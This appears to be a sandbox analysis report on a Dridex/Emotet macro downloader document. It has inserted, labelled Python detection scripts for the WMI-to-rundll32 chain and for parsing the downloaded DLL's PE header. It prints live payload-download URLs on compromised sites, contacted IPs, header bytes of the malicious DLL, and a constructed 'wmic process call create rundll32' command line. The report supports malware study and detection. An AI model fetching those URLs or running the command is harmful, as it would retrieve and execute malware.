Analysis Report SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc

Overview

General Information

Sample Name: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc
Analysis ID: 333829
MD5: c6dcea39dc372b31101a825cbae8ef7e
SHA1: 1f30f04ad381c5736c363cf00abb9618a9d4cc91
SHA256: 382c7e5429e0a66875f2600b0d32709e7d3b836fbb8328a42f94ecf11572029a
Tags: Dridex

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded macro with GUI obfuscation
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
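The signatures above, read together with the process names elsewhere in this report (WINWORD.EXE, WMIC.exe, rundll32.exe and the dropped C:\Windows\Temp\5xta3.dll), describe one chain: the document's macro creates a process through WMI, and the downloaded DLL is executed by rundll32.exe. The following detection logic is an added example, not part of the Joe Sandbox report. It evaluates three rules over constructed Sysmon-style process-creation events; the image paths follow the report, while the PIDs, parent/child links and command lines are assumptions made for the illustration (the report does not show the command lines).

```python
"""Detection logic for the Office -> WMI -> rundll32 chain behind the signatures above.

Added example, not part of the Joe Sandbox report.  The events are constructed in the
shape of Sysmon Event ID 1 (process creation) records; image paths follow the report
(WINWORD.EXE, WMIC.exe, rundll32.exe, C:\\Windows\\Temp\\5xta3.dll), while the PIDs,
parent links and command lines are assumptions made for the illustration.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Processes that create children on behalf of WMI callers: wmic.exe itself and the
# WMI provider host, which is the real parent of Win32_Process.Create children.
WMI_HOSTS = {"wmic.exe", "wmiprvse.exe"}
# Writable staging directories: the drop location in the report plus the user temp dir.
STAGING_DIR = re.compile(r"\\(windows\\temp|appdata\\local\\temp)\\", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_wmi(ev: ProcEvent) -> bool:
    """Word/Excel/PowerPoint starting a WMI host: the macro's first hop."""
    return basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in WMI_HOSTS


def wmic_process_create(ev: ProcEvent) -> bool:
    """wmic.exe asked to create a process (Win32_Process.Create through the CLI)."""
    return (basename(ev.image) == "wmic.exe"
            and re.search(r"process\s+call\s+create", ev.cmdline, re.IGNORECASE) is not None)


def wmi_runs_staged_dll(ev: ProcEvent) -> bool:
    """rundll32.exe started by a WMI host with a DLL from a staging directory."""
    return (basename(ev.parent_image) in WMI_HOSTS
            and basename(ev.image) == "rundll32.exe"
            and ".dll" in ev.cmdline.lower()
            and STAGING_DIR.search(ev.cmdline) is not None)


RULES = {
    "office_spawns_wmi": office_spawns_wmi,
    "wmic_process_create": wmic_process_create,
    "wmi_runs_staged_dll": wmi_runs_staged_dll,
}


def evaluate(events):
    """Return (rule name, pid, image) for every rule that fires on every event."""
    return [(name, ev.pid, basename(ev.image))
            for ev in events for name, rule in RULES.items() if rule(ev)]


WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
WMIPRVSE = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
RUNDLL32 = r"C:\Windows\System32\rundll32.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed events: the malicious chain plus one benign rundll32 launch that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(1304, WINWORD,
              '"WINWORD.EXE" /n "C:\\Users\\user\\Desktop\\SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc"',
              812, EXPLORER),
    ProcEvent(2216, WMIC, 'wmic process call create "rundll32.exe C:\\Windows\\Temp\\5xta3.dll,#1"',
              1304, WINWORD),
    ProcEvent(2704, RUNDLL32, r"rundll32.exe C:\Windows\Temp\5xta3.dll,#1", 1880, WMIPRVSE),
    ProcEvent(2760, RUNDLL32, r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL", 812, EXPLORER),
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(*alert)
```

Win32_Process.Create children are started by the WMI provider host, so a rundll32.exe launched this way has WmiPrvSE.exe rather than wmic.exe or WINWORD.EXE as its parent; that is why both hosts appear in WMI_HOSTS and why the rule for the DLL stage keys on the staging path instead of on an Office parent.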

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Virustotal: Detection: 43%
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Windows\Temp\5xta3.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\q3H69D5AKRPk[1].php Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.rundll32.exe.1d0000.1.unpack Avira: Label: TR/ATRAPS.Gen2

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wellnessway.co.za
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 41.185.8.141:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 41.185.8.141:443

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 24 Dec 2020 03:45:42 GMTContent-Type: application/octet-streamContent-Length: 192512Connection: keep-aliveContent-Transfer-Encoding: BinaryX-User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Last-Modified: Thu, 01 Jan 1970 00:00:00 GMTX-Httpd: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: W NC:000000 UP:Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 00 a2 9e 69 61 cc cd 69 61 cc cd 69 61 cc cd 07 3c ce cc d2 60 cc cd 77 33 4f cd f2 60 cc cd 9b 38 cd cc 7c 60 cc cd bb 3a cc cc 95 61 cc cd 72 fc 56 cd ba 61 cc cd 72 fc 66 cd dc 60 cc cd 64 33 13 cd 98 61 cc cd 14 18 10 cd 9b 61 cc cd 9b 38 cc cc 44 61 cc cd dc ff 10 cd e3 60 cc cd 9b 38 cd cc c4 61 cc cd fe 3f c8 cc 3a 61 cc cd 06 17 67 cd f9 61 cc cd ab 8d 02 cd 53 60 cc cd ab 8d 02 cd b5 61 cc cd 64 33 13 cd 91 61 cc cd f2 8a 00 cd 36 60 cc cd fb 3f cf cc 37 61 cc cd dc ff 11 cd 93 60 cc cd 77 33 5e cd 2b 60 cc cd 4c 16 12 cd 0a 60 cc cd 72 fc 67 cd 24 61 cc cd 52 69 63 68 69 61 cc cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 0e e4 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 01 00 50 00 00 00 
10 00 00 00 10 00 00 40 57 00 00 00 10 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 05 00 00 00 05 00 02 00 00 00 00 00 00 10 03 00 00 10 00 00 00 00 00 00 02 00 44 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 63 00 00 b4 00 00 00 00 70 02 00 88 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 b4 01 00 00 73 60 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 4f 00 00 00 10 00 00 00 50 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e7 07 00 00 00 60 00 00 00 10 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
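The response above is what the signature keys on: a 200 with Content-Type application/octet-stream whose body starts with the MZ magic and a DOS stub. Two more things can be read off the dump. The IMAGE_FILE_HEADER TimeDateStamp (bytes e6 0e e4 5f, 0x5FE40EE6) decodes to 2020-12-24 03:45:42 UTC, the same second as the Date header, and the Characteristics word 0x2102 has IMAGE_FILE_DLL set, which fits the rundll32.exe execution elsewhere in this report. The following script is an added example, not part of the Joe Sandbox report: it splits the raw response, walks the DOS and COFF headers, and turns those observations into findings. The header lines are the ones shown above (one per line here, and only the ones the checks use); the body is constructed, with the 64-byte DOS header and the 28 bytes from "PE\0\0" through the optional-header Magic copied from the Data Raw dump, the DOS stub and Rich header between them (offsets 0x40-0x1AF) replaced by zero padding, and the rest of the 192512-byte file not reproduced. Reading a timestamp that matches serve time as a binary produced per request is an inference from those two values, not something the sandbox states.

```python
"""Checks behind "Downloads executable code via HTTP", run on the captured response.

Added example, not part of the Joe Sandbox report.  RESPONSE_HEAD reproduces the
response headers the report shows (one per line, only those used below).  BODY is
constructed: the 64-byte DOS header and the 28 bytes from "PE\0\0" through the
optional-header Magic are copied from the report's Data Raw dump; the DOS stub and
Rich header between them (offsets 0x40-0x1AF) are replaced by zero padding and the
remainder of the 192512-byte file is not reproduced.
"""
import struct
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

RESPONSE_HEAD = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx\r\n"
    b"Date: Thu, 24 Dec 2020 03:45:42 GMT\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 192512\r\n"
    b"Content-Transfer-Encoding: Binary\r\n"
    b"Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT\r\n"
    b"\r\n"
)
DOS_HEADER = bytes.fromhex(
    "4d5a900003000000" "04000000ffff0000" "b800000000000000" "4000000000000000"
    "0000000000000000" "0000000000000000" "0000000000000000" "00000000b0010000"
)
# "PE\0\0", IMAGE_FILE_HEADER (20 bytes), then Magic and linker version of the optional header.
PE_HEADER = bytes.fromhex("50450000" "4c010500" "e60ee45f" "00000000" "00000000" "e0000221" "0b010c01")
E_LFANEW = 0x1B0  # little-endian dword at offset 0x3C of DOS_HEADER
BODY = DOS_HEADER + b"\x00" * (E_LFANEW - len(DOS_HEADER)) + PE_HEADER  # padding is constructed
SAMPLE_RESPONSE = RESPONSE_HEAD + BODY

IMAGE_FILE_DLL = 0x2000
PE32_MAGIC = 0x10B
MACHINE_NAMES = {0x14C: "i386", 0x8664: "x86-64"}


def split_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status line, {lower-case header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_pe(body: bytes) -> dict:
    """Read the DOS header and IMAGE_FILE_HEADER; raise ValueError if either magic is missing."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        raise ValueError("no MZ magic")
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    if body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, sections, timestamp, _symtab, _nsyms, _optsize, chars = struct.unpack_from(
        "<HHIIIHH", body, e_lfanew + 4)
    (magic,) = struct.unpack_from("<H", body, e_lfanew + 24)
    return {"e_lfanew": e_lfanew, "machine": machine, "sections": sections,
            "timestamp": timestamp, "characteristics": chars, "optional_magic": magic}


def assess(raw: bytes = SAMPLE_RESPONSE):
    """Return (PE header fields, findings) for a 200 response whose body is a PE image."""
    status, headers, body = split_response(raw)
    if not status.startswith("HTTP/1.1 200"):
        return None, []
    pe = parse_pe(body)
    findings = [
        f"PE image served as {headers.get('content-type', '?')}: "
        f"{MACHINE_NAMES.get(pe['machine'], hex(pe['machine']))}, "
        f"{'PE32' if pe['optional_magic'] == PE32_MAGIC else 'PE32+'}, {pe['sections']} sections"
    ]
    if pe["characteristics"] & IMAGE_FILE_DLL:
        findings.append("payload is a DLL (consistent with the rundll32.exe execution in the report)")
    served = parsedate_to_datetime(headers["date"])
    built = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    if abs((served - built).total_seconds()) <= 60:
        findings.append(f"link timestamp {built:%Y-%m-%d %H:%M:%S} UTC equals the Date header: "
                        "binary produced at request time")
    if headers.get("last-modified", "").startswith("Thu, 01 Jan 1970"):
        findings.append("Last-Modified is the Unix epoch: the server reports no real file age")
    return pe, findings


if __name__ == "__main__":
    pe, findings = assess()
    print(f"e_lfanew=0x{pe['e_lfanew']:x} timestamp=0x{pe['timestamp']:08x} "
          f"characteristics=0x{pe['characteristics']:04x}")
    for finding in findings:
        print("-", finding)
```

On a live capture the same function runs over the full body; the only change is that the section table after the optional header becomes available, and the Content-Length can be checked against the bytes actually received.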
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /nx3jY0Jl.php HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: sypher.biz
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
GET /wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: explainervideoz.com
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
GET /wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.php HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: penniesforsense.com
Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A170CE5-5575-4F65-9737-3BA52E43A74D}.tmp
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comx equals www.linkedin.com (Linkedin)
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: wellnessway.co.za
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Thu, 24 Dec 2020 03:45:37 GMT
Server: Apache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: WMIC.exe, 00000002.00000002.2390338673.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: http://cert.int-x3.letsencrypt.org/03
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: WMIC.exe, 00000002.00000002.2390338673.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: WMIC.exe, 00000002.00000002.2390608354.0000000004D1F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: WMIC.exe, 00000002.00000003.2138832985.000000000335E000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: WMIC.exe, 00000002.00000002.2387605507.000000000340E000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: WMIC.exe, 00000002.00000003.2138890700.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: WMIC.exe, 00000002.00000003.2125352127.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WMIC.exe, 00000002.00000002.2390338673.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: WMIC.exe, 00000002.00000002.2385171774.000000000036D000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.2.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138583662.000000000252C000.00000004.00000001.sdmp, WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php.NET4.0E)
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php.NET4.0E)W
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.phpET4.0E)
Source: WMIC.exe, 00000002.00000002.2385198950.00000000003B0000.00000004.00000020.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.phpO
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: http://explainervideoz.com/wp-content/themes/twentyten/images/headers/aaorUbaTEVN8.php~
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: WMIC.exe, 00000002.00000002.2390338673.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: WMIC.exe, 00000002.00000003.2138890700.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: WMIC.exe, 00000002.00000002.2387605507.000000000340E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: WMIC.exe, 00000002.00000002.2387605507.000000000340E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: WMIC.exe, 00000002.00000002.2390412134.0000000004C5B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385171774.000000000036D000.00000004.00000020.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.php
Source: WMIC.exe, 00000002.00000002.2390591212.0000000004D19000.00000004.00000001.sdmp String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.php/v
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.phpN
Source: WMIC.exe, 00000002.00000002.2390591212.0000000004D19000.00000004.00000001.sdmp String found in binary or memory: http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.phpO
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: WMIC.exe, 00000002.00000002.2388627093.0000000004760000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385724336.00000000024C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000002.00000002.2385309728.0000000001C00000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
